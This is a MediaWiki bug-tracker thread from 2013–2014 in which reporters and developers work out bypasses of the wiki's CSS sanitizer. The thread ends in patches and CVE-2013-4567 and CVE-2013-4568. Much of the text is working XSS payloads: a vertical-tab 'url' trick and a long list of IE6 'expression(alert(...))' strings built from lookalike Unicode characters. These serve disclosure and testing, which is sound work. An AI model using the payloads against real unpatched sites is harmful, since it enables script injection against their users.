Last modified: 2014-01-14 10:38:01 UTC
I was reviewing Gerrit change #87648 and happened to find this vulnerability in the existing code. The patch looks like it might fix the vulnerability (provided, of course, that all callers filter out unescaped vertical tabs), though I'm not sure whether that was the author's intent. So it's possible that others already know about this vulnerability. To reproduce (works in at least Firefox and Chromium), paste this wikitext in the edit box and hit Preview: <p style="font-size: 100px; background-image: url\b(https://www.google.com/images/srpr/logo6w.png)">A</p> Actual Result: Logo is loaded from Google server and displayed Expected Result: Logo should not be loaded from Google server or displayed. CSS should become /* insecure input */.
It's worth noting that this may allow XSS (using things like behavior, -moz-binding, and JavaScript URLs), and also that there are many other ways to bypass blacklists like this one. For example, the following (adapted from <http://html5sec.org/#css>) works against IE 6: <p style="font-size: 100px; color: expression((title='XSSed'),'red')">B</p> Note that the property name "expression" is written in fullwidth characters. On that page I also notice a couple properties -o-link and pointer-events that aren't blacklisted either.
(In reply to comment #1) > Note that the property name "expression" is written in fullwidth characters. Fullwidth characters are characters like U+FF45 U+FF58 U+FF50 U+FF52 ... I don't know why I wrote "property name" when "expression" isn't one.
(In reply to comment #1) > For example, the following (adapted from > <http://html5sec.org/#css>) works against IE 6: And to further illustrate, <p style="font-size: 100px; color: expʀessɪoɴ((title='XSSed'),'red')">B</p> (using other characters such as U+0280 LATIN LETTER SMALL CAPITAL R, as adapted from <http://trac.edgewall.org/browser/trunk/trac/util/tests/html.py>) also works in IE 6.
(In reply to comment #0) > To reproduce (works in at least Firefox and Chromium), paste this wikitext in > the edit box and hit Preview: > > <p style="font-size: 100px; background-image: > url\b(https://www.google.com/images/srpr/logo6w.png)">A</p> Note: The "\b" attack only seems to work when $wgUseTidy = true; the "fullwidth" and "small caps" attacks against IE 6 work regardless of the $wgUseTidy setting.
Thanks Kevin. I knew our blacklist was missing a couple of properties, but I wasn't aware of the full-width characters or the \b. I'll start working up a patch for those next week. Please let us know if you find any other injections that get past that filter.
Created attachment 13452 [details] Check for vertical tabs, fullwidth, and ipa unicode
This patch should allow us to detect a url when it's followed by a vertical tab, as well as checking for the Fullwidth and IPA unicode attacks on IE6. Parser tests added too, based on the ones from http://trac.edgewall.org/browser/trunk/trac/util/tests/html.py For the -o-link properties, Opera 11+ only allows those on <a> elements, which MediaWiki doesn't allow a way to create with styles. So it would only affect Opera 7-10, which seems to be a tiny fraction of our traffic[0]. I'm not sure if we ever have legitimate uses of that property-- if not, we can add it to the "/* insecure input */" blacklist.
I found a few ways to get around the patch (attachment 13452 [details]). Also note that PHP 5.2.3 (the MW 1.19 minimum requirement) does not support closures. ## Superscript and subscript parentheses (IE 6) <p style="font-size: 100px; background-image:url{CHAR}https://www.google.com/images/srpr/logo6w.png)">A</p> Replace {CHAR} with one of: * U+207D SUPERSCRIPT LEFT PARENTHESIS * U+208D SUBSCRIPT LEFT PARENTHESIS ## Various marks that repeat the S in expression (IE 6) <p style="font-size: 100px; color: expres{CHAR}ion((title='XSSed'),'red')">B</p> Replace {CHAR} with one of: * U+3031 VERTICAL KANA REPEAT MARK * U+309D HIRAGANA ITERATION MARK * U+30FC KATAKANA-HIRAGANA PROLONGED SOUND MARK * U+30FD KATAKANA ITERATION MARK * U+FE7C ARABIC SHADDA ISOLATED FORM * U+FE7D ARABIC SHADDA MEDIAL FORM * U+FF70 HALFWIDTH KATAKANA-HIRAGANA PROLONGED SOUND MARK ## Everything except url( and expression (when $wgUseTidy is true) No check for vertical tab there. Actually, the vertical tab is illegal in XML, and this function should probably not allow anything that is. <div style="font-size: 100px; width: 200px; filter\b:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://www.google.com/images/srpr/logo6w.png');">C</div>
(In reply to comment #8) > ## Everything except url( and expression (when $wgUseTidy is true) Though this actually can affect IE 6 even when $wgUseTidy = false;
(In reply to comment #8) > I found a few ways to get around the patch (attachment 13452 [details]). > Also note that > PHP 5.2.3 (the MW 1.19 minimum requirement) does not support closures. > > ## Superscript and subscript parentheses (IE 6) > > <p style="font-size: 100px; > background-image:url{CHAR}https://www.google.com/images/srpr/logo6w.png)">A</ > p> > > Replace {CHAR} with one of: > > * U+207D SUPERSCRIPT LEFT PARENTHESIS > * U+208D SUBSCRIPT LEFT PARENTHESIS > > ## Various marks that repeat the S in expression (IE 6) > > <p style="font-size: 100px; color: > expres{CHAR}ion((title='XSSed'),'red')">B</p> > > Replace {CHAR} with one of: > > * U+3031 VERTICAL KANA REPEAT MARK > * U+309D HIRAGANA ITERATION MARK > * U+30FC KATAKANA-HIRAGANA PROLONGED SOUND MARK > * U+30FD KATAKANA ITERATION MARK > * U+FE7C ARABIC SHADDA ISOLATED FORM > * U+FE7D ARABIC SHADDA MEDIAL FORM > * U+FF70 HALFWIDTH KATAKANA-HIRAGANA PROLONGED SOUND MARK Did you find those from a list of symbols that IE6 transliterates? Or are you finding these by testing? Since we're (for now) blacklisting, we do want to make sure we get them all. I'd like to rework our css handling to not use inline, and use something like htmlpurify to whitelist, but that's a long ways off. > ## Everything except url( and expression (when $wgUseTidy is true) > > No check for vertical tab there. Actually, the vertical tab is illegal in > XML, > and this function should probably not allow anything that is. > > <div style="font-size: 100px; width: 200px; > filter\b:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://www. > google.com/images/srpr/logo6w.png');">C</div> I'll add it to the forbidden control chars.
Created attachment 13475 [details] IE 6 test script
(In reply to comment #10) > Did you find those from a list of symbols that IE6 transliterates? Or are you > finding these by testing? Since we're (for now) blacklisting, we do want to > make sure we get them all. I'd like to rework our css handling to not use > inline, and use something like htmlpurify to whitelist, but that's a long > ways > off. By testing, so there are probably some I missed (in particular, I did not check for anything above U+FFFF). My test script replaced each of the characters with the HTML escape codes for everything in U+0000..U+FFFF. It did not replace more than one character at a time. Furthermore, my test script seemed to give some false positives (e.g. even though I used <!DOCTYPE html>, the script reported that the equals sign could be substituted for the colon).
I ran your script under ie4linux'es version of ie6, and got back a lot more characters that were valid substitutions for expression. I verified that it gave a popup for each of these. So here are the test cases I'm working against, although this is missing U+008A, U+009A, U+008C and U+009C, since I can't find a way to get those inserted into the input field in Chrome. I'll get a patch in shortly. <div style="top:Expression(alert('e: U+45'))">U+45</div> <div style="top:expression(alert('e: U+65'))">U+65</div> <div style="top:Èxpression(alert('e: U+c8'))">U+c8</div> <div style="top:Éxpression(alert('e: U+c9'))">U+c9</div> <div style="top:Êxpression(alert('e: U+ca'))">U+ca</div> <div style="top:Ëxpression(alert('e: U+cb'))">U+cb</div> <div style="top:èxpression(alert('e: U+e8'))">U+e8</div> <div style="top:éxpression(alert('e: U+e9'))">U+e9</div> <div style="top:êxpression(alert('e: U+ea'))">U+ea</div> <div style="top:ëxpression(alert('e: U+eb'))">U+eb</div> <div style="top:Ēxpression(alert('e: U+112'))">U+112</div> <div style="top:ēxpression(alert('e: U+113'))">U+113</div> <div style="top:Ĕxpression(alert('e: U+114'))">U+114</div> <div style="top:ĕxpression(alert('e: U+115'))">U+115</div> <div style="top:Ėxpression(alert('e: U+116'))">U+116</div> <div style="top:ėxpression(alert('e: U+117'))">U+117</div> <div style="top:Ęxpression(alert('e: U+118'))">U+118</div> <div style="top:ęxpression(alert('e: U+119'))">U+119</div> <div style="top:Ěxpression(alert('e: U+11a'))">U+11a</div> <div style="top:ěxpression(alert('e: U+11b'))">U+11b</div> <div style="top:εxpression(alert('e: U+3b5'))">U+3b5</div> <div style="top:ℇxpression(alert('e: U+2107'))">U+2107</div> <div style="top:℮xpression(alert('e: U+212e'))">U+212e</div> <div style="top:ℯxpression(alert('e: U+212f'))">U+212f</div> <div style="top:ℰxpression(alert('e: U+2130'))">U+2130</div> <div style="top:Expression(alert('e: U+ff25'))">U+ff25</div> <div style="top:expression(alert('e: U+ff45'))">U+ff45</div> <div style="top:eXpression(alert('x: U+58'))">U+58</div> <div style="top:expression(alert('x: U+78'))">U+78</div> <div style="top:eXpression(alert('x: U+ff38'))">U+ff38</div> <div style="top:expression(alert('x: U+ff58'))">U+ff58</div> <div style="top:exPression(alert('x: U+50'))">U+50</div> <div style="top:expression(alert('x: U+70'))">U+70</div> <div style="top:exπression(alert('x: U+3c0'))">U+3c0</div> <div style="top:ex₧ression(alert('x: U+20a7'))">U+20a7</div> <div style="top:ex℘ression(alert('x: U+2118'))">U+2118</div> <div style="top:exℙression(alert('x: U+2119'))">U+2119</div> <div style="top:exPression(alert('x: U+ff30'))">U+ff30</div> <div style="top:expression(alert('x: U+ff50'))">U+ff50</div> <div style="top:expRession(alert('x: U+52'))">U+52</div> <div style="top:expression(alert('x: U+72'))">U+72</div> <div style="top:expŔession(alert('x: U+154'))">U+154</div> <div style="top:expŕession(alert('x: U+155'))">U+155</div> <div style="top:expŖession(alert('x: U+156'))">U+156</div> <div style="top:expŗession(alert('x: U+157'))">U+157</div> <div style="top:expŘession(alert('x: U+158'))">U+158</div> <div style="top:expřession(alert('x: U+159'))">U+159</div> <div style="top:expℛession(alert('x: U+211b'))">U+211b</div> <div style="top:expℜession(alert('x: U+211c'))">U+211c</div> <div style="top:expℝession(alert('x: U+211d'))">U+211d</div> <div style="top:expRession(alert('x: U+ff32'))">U+ff32</div> <div style="top:expression(alert('x: U+ff52'))">U+ff52</div> <div style="top:expreSsion(alert('x: U+53'))">U+53</div> <div style="top:expression(alert('x: U+73'))">U+73</div> <div style="top:expreßsion(alert('x: U+df'))">U+df</div> <div style="top:expreŚsion(alert('x: U+15a'))">U+15a</div> <div style="top:expreśsion(alert('x: U+15b'))">U+15b</div> <div style="top:expreŜsion(alert('x: U+15c'))">U+15c</div> <div style="top:expreŝsion(alert('x: U+15d'))">U+15d</div> <div style="top:expreŞsion(alert('x: U+15e'))">U+15e</div> <div style="top:expreşsion(alert('x: U+15f'))">U+15f</div> <div style="top:expreŠsion(alert('x: U+160'))">U+160</div> <div style="top:exprešsion(alert('x: U+161'))">U+161</div> <div style="top:expreΣsion(alert('x: U+3a3'))">U+3a3</div> <div style="top:expreβsion(alert('x: U+3b2'))">U+3b2</div> <div style="top:expreσsion(alert('x: U+3c3'))">U+3c3</div> <div style="top:expreSsion(alert('x: U+ff33'))">U+ff33</div> <div style="top:expression(alert('x: U+ff53'))">U+ff53</div> <div style="top:expressIon(alert('x: U+49'))">U+49</div> <div style="top:expression(alert('x: U+69'))">U+69</div> <div style="top:expressÌon(alert('x: U+cc'))">U+cc</div> <div style="top:expressÍon(alert('x: U+cd'))">U+cd</div> <div style="top:expressÎon(alert('x: U+ce'))">U+ce</div> <div style="top:expressÏon(alert('x: U+cf'))">U+cf</div> <div style="top:expressìon(alert('x: U+ec'))">U+ec</div> <div style="top:expressíon(alert('x: U+ed'))">U+ed</div> <div style="top:expressîon(alert('x: U+ee'))">U+ee</div> <div style="top:expressïon(alert('x: U+ef'))">U+ef</div> <div style="top:expressĨon(alert('x: U+128'))">U+128</div> <div style="top:expressĩon(alert('x: U+129'))">U+129</div> <div style="top:expressĪon(alert('x: U+12a'))">U+12a</div> <div style="top:expressīon(alert('x: U+12b'))">U+12b</div> <div style="top:expressĬon(alert('x: U+12c'))">U+12c</div> <div style="top:expressĭon(alert('x: U+12d'))">U+12d</div> <div style="top:expressĮon(alert('x: U+12e'))">U+12e</div> <div style="top:expressįon(alert('x: U+12f'))">U+12f</div> <div style="top:expressİon(alert('x: U+130'))">U+130</div> <div style="top:expressıon(alert('x: U+131'))">U+131</div> <div style="top:expressƗon(alert('x: U+197'))">U+197</div> <div style="top:expressǏon(alert('x: U+1cf'))">U+1cf</div> <div style="top:expressǐon(alert('x: U+1d0'))">U+1d0</div> <div style="top:expressℐon(alert('x: U+2110'))">U+2110</div> <div style="top:expressℑon(alert('x: U+2111'))">U+2111</div> <div style="top:expressIon(alert('x: U+ff29'))">U+ff29</div> <div style="top:expression(alert('x: U+ff49'))">U+ff49</div> <div style="top:expressiOn(alert('x: U+4f'))">U+4f</div> <div style="top:expression(alert('x: U+6f'))">U+6f</div> <div style="top:expressiºn(alert('x: U+ba'))">U+ba</div> <div style="top:expressiÒn(alert('x: U+d2'))">U+d2</div> <div style="top:expressiÓn(alert('x: U+d3'))">U+d3</div> <div style="top:expressiÔn(alert('x: U+d4'))">U+d4</div> <div style="top:expressiÕn(alert('x: U+d5'))">U+d5</div> <div style="top:expressiÖn(alert('x: U+d6'))">U+d6</div> <div style="top:expressiòn(alert('x: U+f2'))">U+f2</div> <div style="top:expressión(alert('x: U+f3'))">U+f3</div> <div style="top:expressiôn(alert('x: U+f4'))">U+f4</div> <div style="top:expressiõn(alert('x: U+f5'))">U+f5</div> <div style="top:expressiön(alert('x: U+f6'))">U+f6</div> <div style="top:expressiŌn(alert('x: U+14c'))">U+14c</div> <div style="top:expressiōn(alert('x: U+14d'))">U+14d</div> <div style="top:expressiŎn(alert('x: U+14e'))">U+14e</div> <div style="top:expressiŏn(alert('x: U+14f'))">U+14f</div> <div style="top:expressiŐn(alert('x: U+150'))">U+150</div> <div style="top:expressiőn(alert('x: U+151'))">U+151</div> <div style="top:expressiŒn(alert('x: U+152'))">U+152</div> <div style="top:expressiœn(alert('x: U+153'))">U+153</div> <div style="top:expressiƟn(alert('x: U+19f'))">U+19f</div> <div style="top:expressiƠn(alert('x: U+1a0'))">U+1a0</div> <div style="top:expressiơn(alert('x: U+1a1'))">U+1a1</div> <div style="top:expressiǑn(alert('x: U+1d1'))">U+1d1</div> <div style="top:expressiǒn(alert('x: U+1d2'))">U+1d2</div> <div style="top:expressiǪn(alert('x: U+1ea'))">U+1ea</div> <div style="top:expressiǫn(alert('x: U+1eb'))">U+1eb</div> <div style="top:expressiǬn(alert('x: U+1ec'))">U+1ec</div> <div style="top:expressiǭn(alert('x: U+1ed'))">U+1ed</div> <div style="top:expressiΩn(alert('x: U+3a9'))">U+3a9</div> <div style="top:expressiℴn(alert('x: U+2134'))">U+2134</div> <div style="top:expressiOn(alert('x: U+ff2f'))">U+ff2f</div> <div style="top:expression(alert('x: U+ff4f'))">U+ff4f</div> <div style="top:expressioN(alert('x: U+4e'))">U+4e</div> <div style="top:expression(alert('x: U+6e'))">U+6e</div> <div style="top:expressioÑ(alert('x: U+d1'))">U+d1</div> <div style="top:expressioñ(alert('x: U+f1'))">U+f1</div> <div style="top:expressioŃ(alert('x: U+143'))">U+143</div> <div style="top:expressioń(alert('x: U+144'))">U+144</div> <div style="top:expressioŅ(alert('x: U+145'))">U+145</div> <div style="top:expressioņ(alert('x: U+146'))">U+146</div> <div style="top:expressioŇ(alert('x: U+147'))">U+147</div> <div style="top:expressioň(alert('x: U+148'))">U+148</div> <div style="top:expressioⁿ(alert('x: U+207f'))">U+207f</div> <div style="top:expressioℕ(alert('x: U+2115'))">U+2115</div> <div style="top:expressio∩(alert('x: U+2229'))">U+2229</div> <div style="top:expressioN(alert('x: U+ff2e'))">U+ff2e</div> <div style="top:expression(alert('x: U+ff4e'))">U+ff4e</div> <div style="top:expression(alert('x: U+28'))">U+28</div> <div style="top:expression⌠alert('x: U+2320'))">U+2320</div> <div style="top:expression(alert('x: U+ff08'))">U+ff08</div>
(In reply to comment #13) > I ran your script under ie4linux'es version of ie6, and got back a lot more > characters that were valid substitutions for expression. I verified that it > gave a popup for each of these. (First of all, not everything marked "x:" is substituting for X.) What you have looks like a pretty good match to the bestfit1251.txt and bestfit1252.txt lists (from <http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/WindowsBestFit/>) combined, though I haven't checked in detail. It's odd that the superscript and subscript parentheses aren't in that list though they worked for me on a Windows XP VM (the one from the Microsoft site modern.ie). And outside the Halfwidth and Fullwidth Forms block, out of these, only U+207F seemed to be a problem on a real Windows XP installation (that isn't to say nobody else is running IE6 using Wine though). I suspect IE6 is using some Windows string function that is implemented differently in Wine. I did make the code change the color instead of open an alert box to prevent endless alerting, though it didn't seem to make a difference; I just saw the same code points over and over again.
Alright, I think we should use the modern.ie list, since that should be a fully updated version of IE6. If someone is using an out of date version, I don't think we should be going too far out of our way to help them... they will have worse problems.
Created attachment 13534 [details] Disallow vertical tabs, etc
A call to WideCharToMultiByte() with CodePage=CP_ACP and dwFlags not containing WC_NO_BEST_FIT_CHARS would have this effect. I haven't identified the exact caller responsible, but such calls do seem to be common in IE. <http://msdn.microsoft.com/en-us/library/dd374130%28v=vs.85%29.aspx> "CP_ACP The system default Windows ANSI code page. "Note This value can be different on different computers, even on the same network. It can be changed on the same computer, leading to stored data becoming irrecoverably corrupted. This value is only intended for temporary use and permanent storage should use UTF-16 or UTF-8 if possible." Presumably CP1252 is most commonly used for CP_ACP, in which case bestfit1252.txt would be an appropriate reference.
Sorry, obviously bestfit1252.txt doesn't explain U+309D etc., and I've confirmed that Kevin's script shows U+309D as an issue on my Windows XP VM. Also, if it was plain CP1252 conversion, you would expect U+2320 and a few others to come up, which they don't. Maybe it is some sort of Unicode normalization step followed by CP1252 conversion. I haven't gotten any further with my disassembly, so it's hard to know if the patch is comprehensive. But given the small number of trusted users using IE6, I think it is good enough to release.
Adding Gabriel, so he fix this in parsoid too.
Created attachment 13771 [details] Move ss checks after comment stripping Realized as I was backporting this I was checking for the repeated s before we stripped comments, so "expres/**/ゝion" would get through.
Created attachment 13772 [details] Patch for 1.19 Remove the closure for php 5.2 support
Created attachment 13775 [details] Patch for 1.20
Created attachment 13776 [details] Patch for 1.21
CVE-2013-4567 - Vertical tab allows bypassing filters (all browsers) CVE-2013-4568 - "expression" filtering in IE6 bypassed with non-ascii characters
Change 95545 merged by jenkins-bot: SECURITY: Improve css javascript detection https://gerrit.wikimedia.org/r/95545
Change 95542 merged by jenkins-bot: SECURITY: Improve css javascript detection https://gerrit.wikimedia.org/r/95542
Change 95557 had a related patch set uploaded by CSteipp: SECURITY: Improve css javascript detection https://gerrit.wikimedia.org/r/95557
Change 95538 merged by jenkins-bot: SECURITY: Improve css javascript detection https://gerrit.wikimedia.org/r/95538
Change 95557 merged by jenkins-bot: SECURITY: Improve css javascript detection https://gerrit.wikimedia.org/r/95557
No open patches to review here, hence restting status to RESOLVED FIXED.
Change 101290 had a related patch set uploaded by GWicke: Fix css decoding in the sanitizer https://gerrit.wikimedia.org/r/101290
Change 101290 merged by GWicke: Fix css decoding in the sanitizer https://gerrit.wikimedia.org/r/101290
Change 107301 had a related patch set uploaded by CSteipp: SECURITY: Improve css javascript detection https://gerrit.wikimedia.org/r/107301
Change 107301 merged by MarkAHershberger: SECURITY: Improve css javascript detection https://gerrit.wikimedia.org/r/107301
[Patch merged into REL1_22 branch; closing again]